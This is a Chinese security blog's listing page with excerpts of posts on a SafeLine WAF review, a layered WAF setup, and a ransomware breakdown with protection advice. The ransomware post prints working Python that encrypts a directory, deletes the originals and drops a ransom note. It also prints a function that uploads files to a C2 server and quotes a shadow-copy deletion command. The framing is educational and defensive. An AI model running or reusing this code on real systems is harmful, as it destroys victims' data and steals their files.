首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
13,152 阅读
2
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
7,818 阅读
3
2025最新渗透测试靶场推荐,新手必练的靶场推荐
6,261 阅读
4
src平台推荐,挖SRC必须知道的25个漏洞提交平台
5,815 阅读
5
几个常见的密码字典推荐
5,535 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
靶场实战
SQL注入
提权
代理隧道
域渗透
信息收集
权限提升
hackmyvm
WAF绕过
AI安全
云安全
蓝队防御
权限维持
红队攻击
云服务
白小羽
累计撰写
192
篇文章
累计收到
2
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
6
篇与
的结果
2026-08-25
日均处理数亿+次请求,超100万人都在用的国产 WAF
我曾经遭遇到 SQL 注入 这样的问题,也被 CC 攻击 给弄得到服务器都挂掉,还被 爬虫 弄得到服务器都冒烟,这好几个坑我可是都碰到。干站长这一行当时间久了,最为担忧的,倒还不是流量少。而是某一天服务器的 CPU 忽然就达到了 100%。登录到后台去瞅一瞅,满满的全是陌生的 IP 在疯狂地试探登录接口。那感觉如同半夜里听见有人用钥匙捅你家的锁眼似的。Web 应用防火墙(WAF) 并非是什么新鲜的事物。可是前些年可供选择的并没有太多。商业版本的一年授权费用 好几万起步,小站长根本承受不了。那开源版本的情况又是如何的,ModSecurity 的规则库维护起来比较麻烦。要是正则表达式写错那么一个字,不是漏掉拦截就是错误地杀掉好多。国产的开源 WAF 在近几年才慢慢有了进展,雷池(SafeLine)就是其中的一个,而且还是挺有名气的那一个。官方所给出的数据看起来还挺能唬人的。全球装机量超过 100万台,防护的网站超过 一百万个,日均清洗 HTTP 请求超过 数亿+次。这数据里头到底有多少水分,可得好好地去掰扯掰扯。我可不打算弄个简简单单的试用报告随便应付一下,而是把部署的情况、防护的能力、后台的情况,还有很多在文档里没明明白白说出来的问题,一个一个地分开来讲。你能够看到完整的图文,自己去判断一下它到底是不是配得上这么大的体量。一、简介首先要把这一点给讲清楚了,要不然会有那么一些人会觉得只要安装上一个网络应用方面的防火墙就能够把所有的问题都给解决掉了。雷池是一种呈现 反向代理式 特征的 Web 应用防火墙(WAF)。它既不会处于你的应用代码之中,也并非通过对服务器配置进行修改的方式来开展工作。它就搭建在 Web 服务 和 公网 的中间位置。所有进出的流量都必须得先经过它这里。很多恶意的请求在抵达你真实的服务器之前被阻挡下来了。你能够将它设想成伫立在你网站入口处的保安。访客也就是流量,先抵达保安这儿。保安得去判别你是前来办事的正常用户,还是来搞破坏的坏家伙。正常的就放进去,坏的就留在门外呗。它开展攻击识别所借助的是 语义分析引擎,并非是依靠去堆砌 正则规则。这二者之间的差别还是比较大的,需要进行展开来详细说一说。传统的 Web 应用防火墙(WAF),像 ModSecurity 这类,它的实现yuan'li是:预先准备下众多条关于攻击形态的规则。一旦有请求过来就进行对比,查看是否像坏人(即是否符合攻击特征)。但是问题就在于攻击者天天搞出新的花样来,规则库总是处在后面去追赶(攻击手段)。今天拦住了 Union 注入 这种攻击方式,明天人家就用编码的方式来进行绕过,这时候又得手动去添加规则。雷池的语义解析并非依照那样的路径前行。它在接收到请求之后,得去搞清楚这条请求具体要干什么。是要查询 数据库、要 执行命令,又或者仅仅是翻一下页。在弄清楚意图之后,不管攻击者如何变换模样、如何进行编码,只要目的是相同的,就能够被识别出来。这是两种全然不同的思路。部署的时候不挑剔环境情况,官方提供了通过 Docker 一键拉起 的这样一种方式,前面还可以连接上 宝塔、1Panel、Nginx 这些东西,不会和现有的架构产生冲突,这对于很多已经有业务在运行着、还不想进行大改动的老站点来说可是很友好的。二、安装仅仅依靠官方所说的一条命令是起不到作用的,我在测试的机器上面实际进行了一番操作,把所碰到的很多坑给记录下来。雷池的标准安装就 一行 Docker 命令(自动编排好各个容器):sudo bash -c "$(curl -fsSLk https://waf-ce.chaitin.cn/release/latest/manager.sh)"在完成访问管理端口的运行之后就可以进入到后台之中。但是真正让人犯难的并不是安装的这个事儿,而是 端口规划。由于它需要去做反向代理,得把原本暴露出来的 Web 端口 给接管过来。你之前 Nginx 所监听着的 80 和 443 得让出来给它,真实的服务得挪动到 内网端口 去。对于仅仅只是负责编写代码的开发者来讲,第一次去配置这一块儿可是容易把自己给弄糊涂。添加应用这一个步骤是 关键所在。你得填入真实服务的 上游地址,比如 127.0.0.1:8080 这一类的。接着给雷池去分配一个对外的端口。在分配好之后,用户所访问的就是雷池的端口,请求在经过检测之后才会转发给真实服务。踩坑提醒: 倘若你以往有运用 宝塔 或者 1Panel 来管理 Nginx 的情况,那么就不要让雷池和原来的 Web 服务 去争抢 80/443 端口。正确的做法是:雷池对外使用 80/443,把原来的 Nginx 更改成去监听比如 10080、10443 这类高位端口,之后把 上游 填进去。具体的更改方法我们之前已经拆分了 宝塔 和 1Panel 两套教程,图是比较齐全的,按照它来更改不会出现错误。把东西装完之后进入到后台当中,第一眼所看到的是 站点管理 的页面。在这个页面之中能够看到每一个被保护着的网站以及它的状态情况,配置得有没有妥当一眼就能够清晰明了。总体而言,进行部署的门槛并不是十分地高,但是也不是纯粹的新手依照一步一步的方式就可以成功搞定的。对于具备基本运维概念的人而言,半个小时 就可以把相关的事情给办理好。而对于完全没有接触过反向代理的新手来说,建议首先把官方文档当中的 端口说明 给看完之后再去进行操作。三、实测拦截在部署工作已经完成之后,最为关键的测试便登场。也就是得去瞧瞧它究竟能不能抵御住真实的 攻击载荷。官方的文档里面存在着一套 模拟攻击的测试 的方式方法,它的路是比较简单的,就是运用典型的 SQL 注入 以及 XSS 字符串来对自己的测试站点进行攻击,然后看看雷池会反馈回来些什么内容。我依照这样的做法进行了一轮攻击的操作。攻击的请求被雷池所阻拦住了。返回的是符合标准的 攻击阻断页面。在后台还可以看到完整的详细情况。你留意看下面那一张拦截示例,请求之中有着明显的注入方面的特征。雷池于语义层面将它判定为攻击行为,根本就没有让它去接触后端。更为有价值的是后台方面的 攻击详情 情况。点开那一条拦截记录,你能够看到攻击的类型,还能够看到命中了哪一条 语义规则,能够看到来源的 IP,能够看到请求的路径,甚至于能够看到完整的请求体,这对于事后的复盘来讲是特别有用处的,你不但知道被攻击,还知道对方采用了什么样的招式。我特地去做了好几种不同的变形。比如说将空格替换成注释,把关键字的大小写弄成混合着来写。在语义分析这一块,比起 正则规则 那可是更能够经受得住考验,只要意图没有发生改变,变形基本上就没办法躲避过去。当然也不是完完全全百分之百的(这一点在第五节再去讲)。光自己打自己还不够有说服力,官方还做了一组横向测评,把雷池和 ModSecurity、CloudFlare 放一起比 检出率 和 误报率。严格模式下:对比项雷池(严格模式)雷池(平衡模式)行业常见方案检出率76.17%71.65%参差不齐误报率0.22%0.07%普遍偏高综合准确率99.38%——讲一讲数字背后的实际情形:76% 的检出率 表面上看没拦住大多数,但是那是由于测评集涵盖的攻击类型众多,存在不少冷门的变形情况。但在真实的业务当中,绝大多数是常见的攻击手法,雷池对于这些常见攻击手法的拦截率要比 76% 高上许多。真正让我放在心上的是 误报率 0.22% 以及 0.07%。误报对于企业而言比漏报更加让人犯难:你不期望正常的用户点个页面被拦截出去,又或者下单的时候表单被当作攻击给拦截了。在开源方案里面能够把误报压到这个水准的,并不多。四、四大防护能力逐个拆除了对 Web 攻击 进行阻拦之外,雷池还存在着其他的功能。在文档之中仅仅是简单地提及了一下。但是在实际进行使用的时候,每一个功能都有着自己各自所具备的要点。我现在来逐一地进行讲述一番。4.1 限制访问频率这个功能还是比较有作用的。你可以给某一个接口去设定一个 阈值,比如说 同一个 IP 每秒钟最多来十个请求,要是超过了的话就弹出阻断页面。CC 攻击 简单来说就是大量的请求把你的带宽或者连接数给占据满,频率限制 算得上是第一道关卡。在实际进行搭配的时候需要留意,阈值可不能够借助感觉来确定。阈值要是太过宽松的话就起不到阻挡的作用,要是太过严格的话正常的用户刷动几下就会被阻拦住。建议先开启 日志 来观察几天真实流量的峰值情况,在那之后再返回过来进行调整。4.2 人机验证许多的攻击并不是由人工去进行打击的,而是依靠 自动化工具 来进行批量的扫描。雷池可以在可疑的流量上面弹出 人机验证,真实的人点击一下就能够通过,但是脚本却无法通过。这对于防范扫描器以及阻止垃圾注册是很有功效的。配合着 安全态势页 当中的 人机验证趋势图,你可以明明白白地看到每一天有数量多少的流量被验证给阻挡在了外面。4.3 身份认证我个人认为这是一种被人们所低估了的能力。有不少的网站后台以及管理接口就毫无保留地暴露在公网之上,而且还没有去做鉴权操作,就好像那大门根本就没有锁上似的。那我们是可以在 反向代理那一层 强行再添加一层 登录 的设置,不管后端到底有没有去编写鉴权的相关代码的,外面的人就是进不来。它所支持的认证方式那可真是不少。有 统一认证、钉钉、企业微信、OIDC、GitHub、微信 PC 扫码、CAS 这些。要是企业内网系统想要接入 钉钉 或者 企微 的账号体系,进行配置的也不费劲。对开发者团队,用 GitHub 或 OIDC 登录后台也很顺手:4.4 动态防护此功能还挺有意味的,是值得单独去瞧一瞧的。当开启了这个功能之后,雷池就会把你页面返回的 HTML/JS 每一次都加密成不一样的模样,用户的浏览器是能够正常去解析它的。而别的人要是想要去扒你的前端源码、接口逻辑的,拿到的就是每一次都不一样的乱码。防护前的源码是明文,谁都能读:开了之后,每次访问返回的源码形态都不一样,变成混淆过的乱码:运用这一招式来 防止抄袭 以及 防止脚本窃取接口,是相当直接的做法。不过它的代价就是每次响应都得多进行一层加解密操作,在 极高并发 的情况下会存在那么一点性能方面的开销,不过一般的站点是察觉不出来的。五、后台体验WAF 到底好不好用,后台可是起到关键作用的。仅仅只是拦住了,但是你却不知道都拦了些,那就好比是蒙着眼睛在进行防守。雷池在这一方面做的还算是可以的,把到底拦了多少、拦了些、究竟是谁在攻击我这些都给展示出来。基础统计页 是首页默认视图,访问量、攻击次数、来源国家分布、攻击趋势 都有:高级统计页 能按 客户端、响应状态码、QPS、来源站点 做细分,排查问题更细:安全态势页我单独说,因为它回答了一个管理者最关心的问题:今天我被打了几次,拦住了没。下面是实时安全事件流,哪台机器、什么时间、被什么攻击,滚动展示:还有另外一个具有实用性的小功能。攻击日志 是能够支持 黑白名单 自动进行刷新的。对于很多反复前来的恶意 IP,你可以通过一键操作来将它拉黑,要是不小心误拦住了正常的流量,还能够添加到白名单里面让它得以放行。这可比每次都手动去修改配置要更加省事得多。六、超100万台装机、数亿+次请求,意味着什么回到最开始所提及的那一个数字。每一天平均有着 数亿次+ 的清洗操作、超100万台 设备的装机情况、100 万个 网站处于运行的状态。这并非是某一个大型工厂的内部数据,而是全世界许许多多的中小站长、企业、开发者一同创造出来的生产方面的数据。对于一般的用户而言,这个数目字意味着三件事情。那我就一项一项地跟您来讲讲。第一,已经有众多之人踩过坑了,坑差不多都被填平了。 你在部署的时候所碰到的报错、端口冲突、某一个特殊框架之下的兼容问题,十有八九别人已经碰到过,官方也已经将它给修复好。开源项目就害怕你是第一个去尝试的人,雷池肯定不是那种状况。第二点,在社区活动这一块,资料是比较容易去找到的。 比如说部署出现报错、配置方面有冲突这些状况,用搜索引擎这么一搜索,就能找得到大把大把现成的答案以及很多踩坑的帖子。这可比很多文档弄得乱七八糟、提了问题没人回应的项目要强多。要是出了问题,你可不会对着黑屏干着急。第三点,这个项目在短时间之内是不会出现黄掉这种情况的。 开源的项目就害怕作者不干了,然后就变成那种没人去管理的烂摊子。这个项目有着 100万 的装机量,背后是有商业公司 长亭 在进行推动的,而且还有专业版在维持着,至少在近几年是不用去操心它会出现断更这类事情的。和很多下载量仅仅就只有个位数的小众的方案相比较,选择它出现问题的可能性要小上很多很多。这个 100万 可不是那种虚假设立的数字,它就是真真切切的让人有安全感的东西。七、说点不好听的全部都讲优点那就是软文,得泼一泼冷水。雷池社区版本有些方面得弄清楚,我尽可能说得具体一点儿。1. 语义分析对未知变形攻击的检出率并非 100%。 在横向测评集当中,综合的数值是 76%。在真实业务里常见的手法能够较好地进行拦截,可是当遇到比较冷门的 0day 思路的时候,仍然是存在有可能被漏检的情况。不要将语义分析当作是万能的防护盾牌,后端的鉴权、最小权限、定期进行打补丁这些纵深防御方面的措施,该去做的还是得去做。2. 部署要有一点运维底子。 对于 端口转发、反代链路 这些得弄明白。新手第一次进行配置的时候,很容易把自己给弄晕乎了。要是前面挂了 宝塔 或者 1Panel 的话,端口规划 要是不对就会使得站点出现 502 的情况。建议先去看看官方的端口说明,要不就按照我们所写的部署教程来做。3. 高级能力在专业版里。 社区版是能够在日常进行使用的,但是如果想要更加细致的防护策略、集群管理、商业性质的支持,还有合规性的审计这些方面的话,那就得要花钱去购买 专业版 了。这并不算是坑害别人,但是得要有这样的一个预期才行。4. 动态防护有轻微性能开销。 对于高并发的站点,是需要去进行一番评估的。通常来讲业务层面是察觉不出来的,但是可千万不要就不管不顾地把它全部都开启。另外还有这么一句话,文档里没写到的就是:配置同步(多节点) 社区版是能够支持的,但是 配置下发存在时延,可别期望着秒级生效。八、总结对于站长以及独立开发者还有小团队的运维人员而言,我的观点是:值得上,而且应该尽早去安装。理由并不复杂。它是 免费、是 开源 的,只需要 一条命令 就可以进行安装,而且 误报率还低,后台也是清清楚楚的,并且还能够阻挡住大部分常见的 Web 攻击。在安全这一方面,像这种投入小、回报实实在在的事情可是不多见的。我见过好多人的网站被挂马、被当作肉鸡,回过头去问他们之前都干什么去了,答案往往就是觉得 WAF 麻烦或者觉得它贵。雷池把这两个门槛都给消除掉。就算你已经拥有了 Nginx 的 limit_req 或者 CDN 的防护措施,在前面再加上雷池来进行一层语义分析也是挺好的。多层的防线原本就是正确的做法。并没有哪一种防护能够借助一层把所有的情况都给挡住。当然,也可别把它给想象得太过神奇。它可不是那万能的解决问题的法子。该去做后端鉴权的依旧还是得去做,该去打补丁的还是得去打。把它当作是网站安全的头一道关卡,老老实实地去运用它就成。下一步建议: 如果你决定上,优先把 限制访问频率 和 身份认证 这两个开关打开。这两个开关对于中小站点的收益影响是最为重大的。其中一个能够阻挡 CC 攻击,另一个能够堵住后台未被授权的访问,这两个都是见效非常快速的。再就是可以扫描下方二维码,加入雷池社群,获取更多的技术帮助,感谢阅读
2026年08月25日
261 阅读
0 评论
0 点赞
2026-07-21
团队搭建AI知识库,这20个开源项目就够了
之前曾经发布过一篇有关知识库推荐的相关内容。有人问我哪些是必须要搭建服务器,并且还能够让团队一同使用的情况。实际上比如Obsidian、AnythingLLM桌面版这类软件自己使用一下还可以,要是想要给团队进行分享、对外提供服务的话,那么还是得把它们部署到服务器上面才可以。部署的难度我同样也进行了标注,存在有那种从一键就可以启动的情况,也存在有需要专门去进行运维的情况,你就依据自己团队的规模来进行选择就是。服务器推荐
2026年07月21日
868 阅读
0 评论
0 点赞
2026-07-15
勒索病毒技术拆解与预防,更好的保护你的数据
前一阵子帮朋友处理一台被勒索病毒加密了的服务器,数据库全都被锁住,桌面上有勒索信,要求是0.3个比特币。处理完之后觉得得把这事儿完完整整地从开头到结尾拆解开来解说清楚。只有弄清楚了攻击的原理,才能够知道防护的重点到底是什么。声明:本文所有代码仅用于安全研究和教学目的,编写、传播恶意软件属于违法行为。一、勒索病毒的核心原理勒索病毒的本质其实非常简单,核心流程只有三步:入侵:通过各种途径进入目标系统加密:使用加密算法锁定用户文件勒索:留下勒索信息,要求支付赎金换取解密密钥加密所采用的是标准的AES以及RSA算法,这些算法它自身是属于合法的,银行还有HTTPS都在运用着它们。可问题就在于,密钥就只是在攻击者的手里边,受害者是没有那个解密的能力的。实际上真正导致大规模破坏的乃是其传播的机制。早期的勒索病毒主要是借助钓鱼邮件的附件来进行传播。而现如今更多的则是直接去扫描公网的IP,运用未打上补丁的漏洞以及弱口令这类的方式来实施入侵。在入侵之后通常并不会立刻就发作,而是先在局域网之内进行横向的移动,尽可能地去感染更多的机器,等到合适的时机,比如说周末没人值守的时候,再统一地去执行加密操作。我遇到了一个典型的情况。病毒是在周五晚上的时候侵入进来的,它潜伏隐藏了有两天,直到周一早上全公司开启计算机的时候才触发了加密操作。就连备份服务器都被加密,这是因为备份硬盘一直是挂接在服务器上面的,结果被病毒一块儿给搞了。二、常见勒索病毒类型分析1. 经典加密型(Crypto Ransomware)这乃是极为基础且颇为常见之类型。存在比如WannaCry、Locky、CryptoLocker这类代表家族。其特点可是十分简单直接:入侵之后便会去遍历磁盘,对文档、图片、数据库、压缩包等用户文件实施AES加密,还会去修改文件后缀名,然后就在每个目录里面放置勒索信。这类病毒其技术层面的门槛是比较低的。但是它的破坏能力却是十分强大的。这是因为它所采用的加密运用的是已经成熟了的标准算法。要是密钥处理得不错的话,在不存在私钥的时候,从理论上来说是没有办法去进行解密的。2. 双重勒索型(Double Extortion)近些年来很流行这样的一种模式。有像Conti、REvil、DarkSide等这样的家族来代表着它。它比那单纯的加密可要厉害得多。在对文件进行加密之前,先把比如商业机密、客户信息、财务数据等这类敏感的数据神不知鬼不觉地就上传到攻击者的服务器,然后再去执行本地的加密操作。这也就意味着,就算你拥有完整的备份从而能够恢复数据,但是攻击者依旧还是有可能会对泄露你的数据进行威胁,并且拿这个事情来进行施压让你支付赎金。有不少企业因为害怕数据泄露会影响到商誉或者遭遇到合规方面的处罚,只能够依从(攻击者的要求)。而后甚至发展成为三重勒索的情况,既对泄露数据进行威胁,又会发动DDoS攻击,还会去通知客户或者监管机构。3. 蠕虫传播型(Worm-style)代表的是WannaCry以及NotPetya这类病毒。这类病毒存在着一个最大的特点,那就是能够自己进行复制并且还能够主动地进行传播,不需要用户去点击什么东西。WannaCry所利用的是NSA所泄露出来的EternalBlue(永恒之蓝)漏洞,它针对Windows SMB协议的445端口来发起攻击,能够在局域网里面自动地进行扫描、自动地进行入侵、自动地进行传播,没过几个小时就能够把一个机构的所有机器都给感染了 。这类病毒发作起来的速度是极其迅速的。要是你察觉到有机器遭受到了感染,到那个时候常常整个内部网络已经大面积地被感染了。4. 勒索即服务(RaaS, Ransomware as a Service)当下黑产的主流运营模式便是这般,LockBit、BlackCat/ALPHV、Play等便是其代表。技术团队开发好了勒索病毒的整套工具,这里边包含生成器、C2面板、解密工具、数据泄露网站。之后招募加盟攻击者也就是affiliates。加盟攻击者不需要懂得技术,只要能够获取到目标网络的权限,就可以拿现成的病毒去进行攻击,赎金按照比例来进行分成。RaaS模式使得勒索攻击的门槛变得极其之低,这便是近些年来勒索事件呈现出爆发式增长的关键缘故所在。5. 定向攻击型(Big Game Hunting)这类针对大型企业、医院、政府机关、关键基础设置等具有高价值的目标所实施的攻击行为,并非是进行广泛范围的扫描,而是有着明确的目标指向。会花费数周乃至数月的时间去进行侦察活动,对目标网络的拓扑结构、域环境状况以及备份策略等进行研究,甚至会首先对备份系统进行破坏,在确认一切准备就绪之后才发起攻击行动,像Colonial Pipeline输油管道被攻击就是一个典型的示例。三、技术实现拆解(教育目的)想要去理解防护方面的逻辑,那我们就来瞧一瞧一个最为简单的概念演示情况。这是一个仅仅是为了理解原理的玩具性质的版本,只是对特定目录进行加密处理,不进行传播行为、不连接网络、不执行删除备份的操作,在运行之后密钥就直接被打印出来。基础加密型演示我们用Python的cryptography库来演示,Fernet是一个封装好的对称加密库,使用AES-CBC模式:import os from cryptography.fernet import Fernet def generate_key(): """生成加密密钥""" return Fernet.generate_key() def encrypt_file(file_path, key): """加密单个文件""" f = Fernet(key) with open(file_path, 'rb') as file: original_data = file.read() encrypted_data = f.encrypt(original_data) # 写入加密后的文件 with open(file_path + '.locked', 'wb') as encrypted_file: encrypted_file.write(encrypted_data) # 删除原文件 os.remove(file_path) def decrypt_file(file_path, key): """解密单个文件""" f = Fernet(key) with open(file_path, 'rb') as file: encrypted_data = file.read() decrypted_data = f.decrypt(encrypted_data) original_path = file_path.replace('.locked', '') with open(original_path, 'wb') as decrypted_file: decrypted_file.write(decrypted_data) os.remove(file_path) if __name__ == '__main__': key = generate_key() target_dir = './test_files' print(f"密钥(丢失则无法恢复): {key.decode()}") # 递归遍历所有子目录 for root, dirs, files in os.walk(target_dir): for filename in files: if filename.endswith('.locked'): continue file_path = os.path.join(root, filename) encrypt_file(file_path, key) print(f"已加密: {file_path}") with open(os.path.join(target_dir, 'README_RESTORE.txt'), 'w') as note: note.write("你的文件已被加密。\n") note.write("支付xxx比特币到钱包地址xxx以获取解密工具。\n")测试看看加密当前目录下的test_files他的文件后缀全部变成了 locked,如果没有密匙文件,是无法解密的随后留下一个文本,让你支付比特币这个版本不到50行代码,但你可以看出它和真正勒索病毒的差距:密钥管理这一块,玩具版是在本地生成密钥,在运行的时候就直接给打印出来。而真实的勒索病毒,是把RSA公钥硬编码在病毒里头,在本地随机生成AES密钥去加密文件,接着用RSA公钥把AES密钥加密之后发送到C2服务器。私钥就只在攻击者的服务器那边,逆向病毒也是没办法拿到的。玩具版的遍历范围乃是仅仅对指定的test_files目录进行加密。而真实的病毒会去遍历所有的盘符,比如本地磁盘、网络共享盘、U盘,甚至于云盘同步目录都会进行遍历。并且真实的病毒会有选择性地去加密用户的文件,像是文档、数据库、图片这类,它不会去触碰系统文件,因为要是系统文件被加密从而导致系统无法启动了,那就没有人会支付赎金了。反恢复之手段:真实的病毒会做出如下这些行径,运用vssadmin delete shadows /all /quiet来删除卷影副本,禁用系统之还原功能,停止备份服务,并且还会将Windows备份目录予以删除 。对抗分析这一块,存在有加壳这样的操作,还有反调试的手段,反沙箱的措施,检测虚拟机环境的状况,以及延迟执行的状况,比如说等待好几个小时才开始加密,通过这样的方式来绕过沙箱的动态分析时间窗口。双重勒索的额外步骤双重勒索只是在加密之前增加一个数据外传的环节:import requests def exfiltrate_file(file_path, c2_url): """外传文件到C2服务器""" # 只外传小于某个阈值的重要文件,避免大文件传输太慢被发现 if os.path.getsize(file_path) < 10 * 1024 * 1024: # 小于10MB with open(file_path, 'rb') as f: files = {'file': (os.path.basename(file_path), f)} try: requests.post(c2_url, files=files, timeout=10) except: pass # 外传失败不影响加密流程在那真实的环境状况之中,最先将会去开展压缩的操作,随后会去开展分块传输的相关动作,并且还会借助加密代理又或者是Tor网络来把C2地址给隐藏起来 。蠕虫传播的核心逻辑在蠕虫传播的相关情况里,存在着一部分技术含量比较高的内容。其核心之处在于漏洞的利用。就以永恒之蓝这个例子来讲,需要去构造特殊的SMB请求包,然后将这个构造好的SMB请求包发送到目标的445端口。当触发了漏洞之后就会执行shellcode,随后就去下载病毒的本体来进行执行。而这一部分并没有稳定且通用的代码可以用来进行演示,这是因为漏洞的利用和系统的版本、补丁的状态是紧密相关联的。这便是RaaS模式可以获取利益的缘由所在。去编写一个稳定的漏洞利用exp是需要具备极为强大的技术能力的。一般的攻击者是没办法弄出这类exp的。那么他们就只能够去购买相关的服务。真实病毒还会做的事停止数据库服务(SQL Server、MySQL、Oracle等),因为数据库文件运行时被占用,加密不了删除Windows事件日志,清除入侵痕迹修改注册表实现开机自启关闭或杀掉杀毒软件进程清除系统还原点和备份枚举局域网共享和域内机器,进行横向移动遍历RDP连接记录和保存的凭据,扩大感染范围四、企业防护方案我从事安全工作已经有了一些时日。我察觉到这么一个状况,众多企业出现问题,并非是由于某些高深的零日漏洞相关的原因,而是跌倒在了极为基础的问题之上。举例而言没有打上补丁、存在弱口令、备份盘始终处于连接状态、端口通通暴露在公共网络之上。防护,简单来说就是那么一些个事情,但是真正能够把这些个事情切实做到位的企业那可真是没多少。1. 备份是最后一道防线这是唯一能让你在被加密后不需要付赎金的方案。但备份有几个关键原则:3 - 2 - 1备份准则所指的是,需要起码有3份数据的副本。这些副本得存储在2种不同的介质之上。并且其中要有1份要处于离线状态或者存放在异地。离线的意思就是在物理层面上相互隔离,并非是那种处于公司内网里的另一台服务器,借助内网横向移动就可以把它一同进行加密的这种情形。备份的磁盘不可以一直处于挂载的状态。有很多人将移动硬盘插到服务器上面来进行备份操作,结果在病毒进行加密的时候连备份的磁盘一块儿给加密了。正确的做法是在备份完成之后把连接断开,要不然就使用备份软件的一次性挂载的功能。定期去进行恢复方面的演练是十分重要的。存在着许多这样的事例,有备份的情况,但是当真正到了需要进行恢复的时候,却发现备份已经损坏了、版本也不对头,而且备份软件还没有人会使用。所以仅仅做完备份是远远不够的,还得定期去测试是否能够顺利恢复才行。云服务器需要开启快照功能。云快照是存储在云厂商所提供的对象存储之中的,它和你的实例是相互分离的状态,病毒是没有办法接触到它的。你可以去设置自动快照的策略,每天开展快照操作,保留的时间为7到30天。倘若出现问题了,一键进行回滚操作,要比重装恢复快上很多。2. 堵住入侵入口大多数攻击就从这几个地方进来:关于RDP/SSH出现暴力破解这种情况的话:不要采用密码来进行登录,而是应该运用密钥。不要直接把3389、22端口暴露在公共的网络上面,要么对默认的端口进行更改,要么设置IP白名单只准许公司的IP来进行访问,最为好的方式是通过VPN或者跳板机去进行访问。钓鱼邮件这种情况,人是比较容易出现问题的所在。是得去开展安全培训,不过仅仅依靠培训可还是不够的。在技术方面是要用上邮件网关,来过滤可执行附件、恶意链接以及宏文档。Office的宏默认是处于关闭的状态,可别随随便便就去启用它。漏洞补丁相关状况:在WannaCry爆发的时候,补丁已经发布两个月了。必须去构建补丁管理方面的流程,关键的安全补丁得及时地进行打上,可千万不能拖拖拉拉的。特别是针对面向公网的系统而言,漏洞公开之后,在24小时之内就很有可能会被大规模地进行扫描利用。当扫描器进行扫描的时候,能够发现比如Redis没有密码、数据库存在弱口令、后台有admin/admin这样的情形、还有SMB匿名访问等方面的问题。必须要定期开展内部的弱口令扫描工作。所有的服务都得设置成强密码,并且还要关闭掉不必要的默认账号。3. 最小权限和网络隔离在日常进行运维操作的时候,不要去使用root或者管理员这类的账号。业务程序得用普通用户的权限来进行运行。要把Web目录的权限给设置妥当,不要给予很多没有必要的写权限。有很多的webshell能够获取到权限,就是因为Web目录的权限太大了,直接就可以去修改文件、添加计划任务。服务器仅仅只是用于运行网站而已,那么445 SMB端口没有必要处于开启的状态,135 RPC端口也没有必要处于开启的状态,3389端口同样也没有必要处于开启的状态。得采用最小化安装的这种方式,仅仅开启很多需要用到的端口以及服务。办公网络、业务服务器区域、数据库区域、管理区域之间需要进行ACL访问控制操作。不可以让整个内网全部都能够互相通信,如果一台办公计算机感染了病毒,那么就有可能直接去访问数据库服务器。服务器彼此之间也不要全部都能够互相通信,Web服务器只可以访问它所需要的数据库端口,其余的都得予以拒绝。服务器以及办公电脑都必须去安装EDR或者是杀毒软件,可不要不安装软件就直接去使用。当下的EDR能够检测到勒索行为,要是发现有进程在进行批量加密文件的操作,它便能够直接进行阻止。4. 云服务器特别注意接触过很多中小团队用云服务器,几个坑反复踩:在安全组配置这一块的情况来讲,有相当多的人在购买了服务器之后,安全组默认是处于完全开放的状态就不再去进行理会了。实际上安全组只应当开放必要的端口,像是80和443端口开着就可以。而对于数据库端口,比如说3306、6379、5432这类的,绝对不可以对公网进行开放,只能够允许内网来进行访问。云控制台必须要确保安全。服务器的密码应当足够强,而云控制台的密码则需要更为强大才行。并且还要开启MFA双因素认证。假如控制台被登录了,那么对方不需要去破解你的服务器,直接就在控制台能够卸载你的云盘,之后把它挂载到他自己的机器上读取数据。必须得开启自动快照这个功能。云厂商所赠送的这个自动快照如同后悔药一般。自动快照的成本是相当低的。快照的费用可比赎金便宜好多。得去设置自动快照的策略,可别等到想起来了再手动去进行拍摄。选云服务器的时候,可不要仅仅把目光聚焦在CPU和内存的价格上面。得去查看一下快照是如何进行收费的,安全组到底好不好用,有没有基础的DDoS防护,售后能不能够联系得到人。这些平常看起来好像没什么用处的东西,可是真的出现问题的时候,那可就是能够起到救命作用的东西。现在
2026年07月15日
413 阅读
0 评论
0 点赞
2026-07-15
纵深防御,雷池 + ModSecurity企业级双重 WAF 环境搭建
对于雷池的文章我还有这几篇,包括常见的https配置、雷池+frp反代,以及其他的试用方法都有https://mp.weixin.qq.com/s/3JLrkymD7d46IaWbQup4wQhttps://mp.weixin.qq.com/s/Nvkx7Qdacmm9wx6OpJbejAhttps://mp.weixin.qq.com/s/VBD12Ttwh8JS1oQLC_4gWAhttps://mp.weixin.qq.com/s/z0NU3V4RASBFoE_cG0js7A本篇文章主要讲解halo和雷池的搭建过程,以及防护流量走向,架构设计等等算上自己上班时间,这篇文章总耗时7天+,自认为是一篇非常不错的文章,建议收藏转发,共5k+字,防止后面找不到了在写这篇文章期间遇到过很多部署问题,不过已经被我小羽全部解决了通过本篇文章可以避免很多问题,帮助您搭建属于自己的防护环境,即使您没有任何WAF搭建的经历,也可以通过本篇文章来学习企业级WAF环境搭建的完整流程完整总体网络拓扑架构互联网流量 │ ▼ ┌─────────────┐ │ WAF-A │ 第一层(外层) │ (如雷池) │ └──────┬──────┘ │ 反代 ▼ ┌─────────────┐ │ WAF-B │ 第二层(内层) │ (如ModSec) │ └──────┬──────┘ │ 反代 ▼ ┌─────────────┐ │ halo │ 真实后端 └─────────────┘若读过我这篇文章的师傅们,2025最新教程,使用雷池搭建内网靶场,进行简单的WAF绕过搭配上本篇文章的教学,完全能搭建出如下架构的企业级防护环境,再牛逼点,自己再配个系统加固的防护应用为什么要采用这样的架构?不同的WAF产品拦截规则、检测的算法一般都是不同的,如果攻击者绕过了第一层WAF,那么第二层就不一定能绕过了,这才是核心价值,非常恶心的是,现实环境中还真有人这么干,层层防护,做系统加固一般这样的架构第一层WAF,用来拦截常见的攻击手法比如漏扫 / CC,第二层针对真实的业务进行定制拦截,两层分贝专注不同的威胁,如果不嫌流量太多,那你可以全开,这样做的好处就是减少日志分析的压力服务器选购
2026年07月15日
319 阅读
0 评论
0 点赞
2026-07-06
从零开始搭建自己的中转站
服务器选购,这种中转站建议用海外的,就不推荐
2026年07月06日
1,431 阅读
0 评论
1 点赞
1
2